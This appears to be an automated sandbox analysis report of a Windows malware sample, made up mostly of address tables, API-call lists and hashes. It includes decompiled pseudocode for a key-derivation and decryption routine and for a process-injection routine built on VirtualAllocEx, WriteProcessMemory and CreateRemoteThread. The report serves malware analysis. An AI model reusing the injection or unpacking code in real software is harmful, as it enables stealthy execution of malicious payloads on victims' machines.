                                                                                                                                                                                                                                                                                                        			}






















                                                                                                                                                                                                                                                                                                        0x004111d0
                                                                                                                                                                                                                                                                                                        0x004111d1
                                                                                                                                                                                                                                                                                                        0x004111d9
                                                                                                                                                                                                                                                                                                        0x004111e0
                                                                                                                                                                                                                                                                                                        0x004111e6
                                                                                                                                                                                                                                                                                                        0x004111e8
                                                                                                                                                                                                                                                                                                        0x004111ea
                                                                                                                                                                                                                                                                                                        0x004111ef
                                                                                                                                                                                                                                                                                                        0x004111f3
                                                                                                                                                                                                                                                                                                        0x004111f8
                                                                                                                                                                                                                                                                                                        0x004111f8
                                                                                                                                                                                                                                                                                                        0x004111fb
                                                                                                                                                                                                                                                                                                        0x004111fd
                                                                                                                                                                                                                                                                                                        0x00411200
                                                                                                                                                                                                                                                                                                        0x00411205
                                                                                                                                                                                                                                                                                                        0x00411209
                                                                                                                                                                                                                                                                                                        0x00411250
                                                                                                                                                                                                                                                                                                        0x00411258
                                                                                                                                                                                                                                                                                                        0x00411261
                                                                                                                                                                                                                                                                                                        0x00411268
                                                                                                                                                                                                                                                                                                        0x0041126b
                                                                                                                                                                                                                                                                                                        0x0041126d
                                                                                                                                                                                                                                                                                                        0x00411271
                                                                                                                                                                                                                                                                                                        0x00411279
                                                                                                                                                                                                                                                                                                        0x00411280
                                                                                                                                                                                                                                                                                                        0x00411287
                                                                                                                                                                                                                                                                                                        0x00411289
                                                                                                                                                                                                                                                                                                        0x0041128c
                                                                                                                                                                                                                                                                                                        0x00411295
                                                                                                                                                                                                                                                                                                        0x00411295
                                                                                                                                                                                                                                                                                                        0x0041129e
                                                                                                                                                                                                                                                                                                        0x004112a1
                                                                                                                                                                                                                                                                                                        0x004112a3
                                                                                                                                                                                                                                                                                                        0x0041120b
                                                                                                                                                                                                                                                                                                        0x0041120e
                                                                                                                                                                                                                                                                                                        0x00411215
                                                                                                                                                                                                                                                                                                        0x00411219
                                                                                                                                                                                                                                                                                                        0x0041121d
                                                                                                                                                                                                                                                                                                        0x00411228
                                                                                                                                                                                                                                                                                                        0x0041122b
                                                                                                                                                                                                                                                                                                        0x0041122b
                                                                                                                                                                                                                                                                                                        0x0041120e
                                                                                                                                                                                                                                                                                                        0x00411230
                                                                                                                                                                                                                                                                                                        0x00411233
                                                                                                                                                                                                                                                                                                        0x0041123a
                                                                                                                                                                                                                                                                                                        0x0041123f
                                                                                                                                                                                                                                                                                                        0x0041123f
                                                                                                                                                                                                                                                                                                        0x004111ef
                                                                                                                                                                                                                                                                                                        0x00411248

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: fprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 383729395-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c49ccb3d0ebc46086aea4aed49afa7b442f6277188816013a479267d00939ec4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9d1d22da725d0359cd3540e7da02749fe6b1af8f46904c09d6a95be390009998
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c49ccb3d0ebc46086aea4aed49afa7b442f6277188816013a479267d00939ec4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08219F716142108FC354EF2AC88569BB7E4EF88750F05886EF948DB311D738EC85CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: strlen.NTDLL ref: 0041433F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: memcpy.NTDLL ref: 0041438D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: CreateMutexA.KERNEL32 ref: 004143F5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040F2D5), ref: 00414410
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: FindAtomA.KERNEL32 ref: 00414421
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: malloc.MSVCRT ref: 00414439
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: AddAtomA.KERNEL32 ref: 00414463
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: free.MSVCRT ref: 0041448D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414495
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414330: CloseHandle.KERNEL32 ref: 004144A1
                                                                                                                                                                                                                                                                                                        • TlsAlloc.KERNEL32(?,?,?,?,00E72558,004102E5,?,?,FFFFFFFF,0041032C), ref: 0040FCAE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AtomMutex$AllocCloseCreateFindHandleObjectReleaseSingleWaitfreemallocmemcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3969912963-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b1339874b04510f9f22b793b8af731fe632baa0263795f962cb2177b771d1822
                                                                                                                                                                                                                                                                                                        • Instruction ID: 08ba11220197d5884c5fb90774ff7199050f09fd8405595aaced9661a87e5e57
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1339874b04510f9f22b793b8af731fe632baa0263795f962cb2177b771d1822
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95E0DFF0204301DFC7309F66E80430677E0BB48304F54893EE8AA973A0D778540ACB8E
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
                                                                                                                                                                                                                                                                                                        • Instruction ID: e5a886dd6f7ca33b6e05a63634625ffd61cc9a463d586fd81315a615fd3f2724
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EBD09274A0620CEBDB10DBA9D948A8EB7FDEB08291F108598E90997204DA31AF409B90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,10001A51,00003000,00000004,000000BE,?,10001A51,?), ref: 10001A01
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
                                                                                                                                                                                                                                                                                                        • Instruction ID: cb2b1c577f6c2eb629580bdbf47f529d576ce8939b3be3f1cb066eb9375a85c4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59D0C9B4685208BBE710CB84CC56F6ABBACD704751F004185FE089B280D5B1AE0056A1
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(?,?,?), ref: 1000182F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 84b35084efcff6c5970382eaf3cd32c1c52104bf155538fafba3cb0c341aa3c2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8C04C7611430CABCB04DF98DC94DAB37ADBB8C650B04C508FA1D87204C630F9108BA4
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                                        			E04008CF0(BYTE* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				long* _v12;
                                                                                                                                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                                                                                                                        				long* _v24;
                                                                                                                                                                                                                                                                                                        				char* _t31;
                                                                                                                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                                                                                                                        				long** _t35;
                                                                                                                                                                                                                                                                                                        				char* _t52;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                                        					L15:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_t31 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                                        					_t32 = CryptAcquireContextA( &_v12, _t31, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                                                                                                                                                                                                                                                                                        					if(_t32 == 0) {
                                                                                                                                                                                                                                                                                                        						_t32 = GetLastError();
                                                                                                                                                                                                                                                                                                        						_v16 = _t32;
                                                                                                                                                                                                                                                                                                        						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                                        							_t52 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                                        							_t32 = CryptAcquireContextA( &_v12, _t52, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                                                        						if(_t32 != 0) {
                                                                                                                                                                                                                                                                                                        							_t34 = _a16;
                                                                                                                                                                                                                                                                                                        							__imp__CryptHashData(_v20, _a12, _t34, 0);
                                                                                                                                                                                                                                                                                                        							if(_t34 != 0) {
                                                                                                                                                                                                                                                                                                        								_v24 = 0;
                                                                                                                                                                                                                                                                                                        								_t35 =  &_v24;
                                                                                                                                                                                                                                                                                                        								__imp__CryptDeriveKey(_v12, 0x6801, _v20, 1, _t35);
                                                                                                                                                                                                                                                                                                        								if(_t35 != 0) {
                                                                                                                                                                                                                                                                                                        									_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                                                        									CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L15;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                                                                        0x04008cf6
                                                                                                                                                                                                                                                                                                        0x04008d01
                                                                                                                                                                                                                                                                                                        0x04008e1a
                                                                                                                                                                                                                                                                                                        0x04008e20
                                                                                                                                                                                                                                                                                                        0x04008d25
                                                                                                                                                                                                                                                                                                        0x04008d25
                                                                                                                                                                                                                                                                                                        0x04008d35
                                                                                                                                                                                                                                                                                                        0x04008d3f
                                                                                                                                                                                                                                                                                                        0x04008d47
                                                                                                                                                                                                                                                                                                        0x04008d49
                                                                                                                                                                                                                                                                                                        0x04008d4f
                                                                                                                                                                                                                                                                                                        0x04008d59
                                                                                                                                                                                                                                                                                                        0x04008d6d
                                                                                                                                                                                                                                                                                                        0x04008d78
                                                                                                                                                                                                                                                                                                        0x04008d78
                                                                                                                                                                                                                                                                                                        0x04008d59
                                                                                                                                                                                                                                                                                                        0x04008d82
                                                                                                                                                                                                                                                                                                        0x04008d99
                                                                                                                                                                                                                                                                                                        0x04008da1
                                                                                                                                                                                                                                                                                                        0x04008da5
                                                                                                                                                                                                                                                                                                        0x04008db1
                                                                                                                                                                                                                                                                                                        0x04008db9
                                                                                                                                                                                                                                                                                                        0x04008dbb
                                                                                                                                                                                                                                                                                                        0x04008dc2
                                                                                                                                                                                                                                                                                                        0x04008dd5
                                                                                                                                                                                                                                                                                                        0x04008ddd
                                                                                                                                                                                                                                                                                                        0x04008df7
                                                                                                                                                                                                                                                                                                        0x04008dfe
                                                                                                                                                                                                                                                                                                        0x04008dfe
                                                                                                                                                                                                                                                                                                        0x04008ddd
                                                                                                                                                                                                                                                                                                        0x04008e08
                                                                                                                                                                                                                                                                                                        0x04008e08
                                                                                                                                                                                                                                                                                                        0x04008e14
                                                                                                                                                                                                                                                                                                        0x04008e14
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04008d82

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008D3F
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 04008D49
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008D78
                                                                                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008D99
                                                                                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008DB1
                                                                                                                                                                                                                                                                                                        • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 04008DD5
                                                                                                                                                                                                                                                                                                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008DF1
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 04008DFE
                                                                                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 04008E08
                                                                                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008E14
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D30
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D68
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                                                                                                                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                                        • API String ID: 3718126946-947817771
                                                                                                                                                                                                                                                                                                        • Opcode ID: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                                                        • Instruction ID: a60922051ccac58686ce7bb6d252e90d8c3d4a9338f0118c5879c090c3d284f0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5311B75A44209EBFB58DFA4C849BAE77B9FB44704F10C628F601B61C0D7B8A984CF60
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04002510(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				long _v28;
                                                                                                                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                                        					L14:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                                                                        					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                                                        					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                                                                        					_v16 = VirtualAlloc(0, _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                                                        					if(_v16 != 0) {
                                                                                                                                                                                                                                                                                                        						_v32 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                                                        						if(_v32 != 0) {
                                                                                                                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                                                                                                                        							E04007B70(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                                                                        							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                                                                        							_v36 = 0;
                                                                                                                                                                                                                                                                                                        							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                        								E04007B70(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                                                                        								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                                                                        								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							E040026D0(_v16, _v32);
                                                                                                                                                                                                                                                                                                        							if(WriteProcessMemory(_a4, _v32, _v16, _v12, 0) != 0) {
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        								_v28 = 0;
                                                                                                                                                                                                                                                                                                        								_v8 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28);
                                                                                                                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        							return 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                                                                        						if(_v32 != 0) {
                                                                                                                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                                                                        0x04002516
                                                                                                                                                                                                                                                                                                        0x04002521
                                                                                                                                                                                                                                                                                                        0x040026c2
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04002531
                                                                                                                                                                                                                                                                                                        0x0400253a
                                                                                                                                                                                                                                                                                                        0x0400254b
                                                                                                                                                                                                                                                                                                        0x04002554
                                                                                                                                                                                                                                                                                                        0x0400256a
                                                                                                                                                                                                                                                                                                        0x04002571
                                                                                                                                                                                                                                                                                                        0x04002596
                                                                                                                                                                                                                                                                                                        0x0400259d
                                                                                                                                                                                                                                                                                                        0x040025d7
                                                                                                                                                                                                                                                                                                        0x040025e6
                                                                                                                                                                                                                                                                                                        0x040025eb
                                                                                                                                                                                                                                                                                                        0x040025ee
                                                                                                                                                                                                                                                                                                        0x04002600
                                                                                                                                                                                                                                                                                                        0x0400263c
                                                                                                                                                                                                                                                                                                        0x04002641
                                                                                                                                                                                                                                                                                                        0x040025fd
                                                                                                                                                                                                                                                                                                        0x040025fd
                                                                                                                                                                                                                                                                                                        0x0400264e
                                                                                                                                                                                                                                                                                                        0x04002670
                                                                                                                                                                                                                                                                                                        0x04002692
                                                                                                                                                                                                                                                                                                        0x04002698
                                                                                                                                                                                                                                                                                                        0x040026bf
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040026bf
                                                                                                                                                                                                                                                                                                        0x0400267d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04002683
                                                                                                                                                                                                                                                                                                        0x040025b6
                                                                                                                                                                                                                                                                                                        0x040025bd
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040025ca
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040025d0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04002573

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 04002564
                                                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 04002590
                                                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 040025B0
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040025CA
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3668210933-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
